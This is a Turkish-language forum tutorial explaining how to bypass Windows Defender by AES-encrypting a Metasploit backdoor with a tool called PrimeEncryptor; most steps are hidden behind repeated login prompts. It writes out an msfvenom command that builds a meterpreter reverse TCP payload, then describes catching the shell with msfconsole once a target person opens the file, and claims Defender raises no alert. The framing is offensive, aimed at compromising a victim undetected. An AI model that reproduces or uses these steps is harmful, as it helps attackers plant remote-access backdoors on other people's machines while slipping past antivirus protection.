Merhaba, PrimeEncryptor aracını kullanarak Windows Defender'ı nasıl aşabileceğinizi göstereceğim.
Öncelikle aracı sanal makinemize kuralım.
Öncelikle aracı sanal makinemize kuralım.
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
Dosyanın içerisine girerek CodeSnippets içerisindeki AES dosyasını PrimeEncryptor'a kopyalıyoruz.
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
Daha sonra MsfVenom aracını kullanarak bir arka kapı dosyası oluşturuyoruz.
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
Payload üretmek için kullanılan komut ---> msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LOCAL HOST> LPORT=4444 -f raw > payload.bin
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
AES.cpp dosyasında bazı değişiklikler yapmamız gerekiyor, bu yüzden dosyayı açıp değişiklikleri yapıyoruz.İlk yorum kısmını silin ve altındaki diğer yorum kısmını yorumdan kaldırın.
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
ilk bölüm (bölümü sil)
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
Daha sonra Kaydedip Çıkın.
Python kodunu çalıştırdığımızda açılan kodda bize verilen kodları çalıştıralım.
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
Çerçevelediğimiz yeri kopyalayıp terminale yapıştırıyoruz.
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
ip ve portu dinlemek için msfconsol kullanıcaz.
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
Hedef sistemdeki kişi dosyamızı açtığı zaman, shell bize geliyor.
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
Windows Defender tehdit hakkında herhangi bir uyarı vermez. Bu şekilde Windows Defender'ı atlatırız
İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
KONU SİZE FAYDALI OLDUYSA BEĞENEREK DESTEĞİNİZİ SUNABİLİRSİNİZ... TEŞEKKÜRLER.


